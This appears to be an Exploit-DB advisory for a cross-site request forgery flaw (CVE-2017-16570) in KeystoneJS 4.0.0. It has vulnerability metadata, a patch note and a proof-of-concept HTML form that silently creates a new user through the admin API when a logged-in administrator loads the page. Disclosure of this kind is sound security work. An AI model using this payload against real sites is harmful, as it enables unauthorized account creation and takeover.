Application wide CSRF Bypass

vendor:

Keystone

by:

Saurabh Banawar

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Keystone

Affected Version From: 4.0.0

Affected Version To: 4.0.0

Patch Exists: YES

Related CWE: 2017-16570

CPE: a:keystonejs:keystone

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 8.1

2017

Application wide CSRF Bypass

A CSRF vulnerability was discovered in KeystoneJS 4.0.0 which allows an attacker to bypass the CSRF protection and create a new user. The vulnerability exists due to the lack of CSRF protection for the /keystone/api/users/create endpoint. An attacker can craft a malicious HTML page and trick a logged-in user into submitting the form, resulting in a new user being created.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of KeystoneJS.

Source

Exploit-DB raw data:

# Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570


Link: https://vuldb.com/?id.109170


Exploit:

<html>
 <body>
 <form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data">
 <input type="hidden" name="name&#46;first" value="Saurabh" />
 <input type="hidden" name="name&#46;last" value="Banawar" />
 <input type="hidden" name="email"
value="saurabh&#46;banawar&#64;securelayer7&#46;net" />
 <input type="hidden" name="password" value="test" />
 <input type="hidden" name="password&#95;confirm" value="test" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>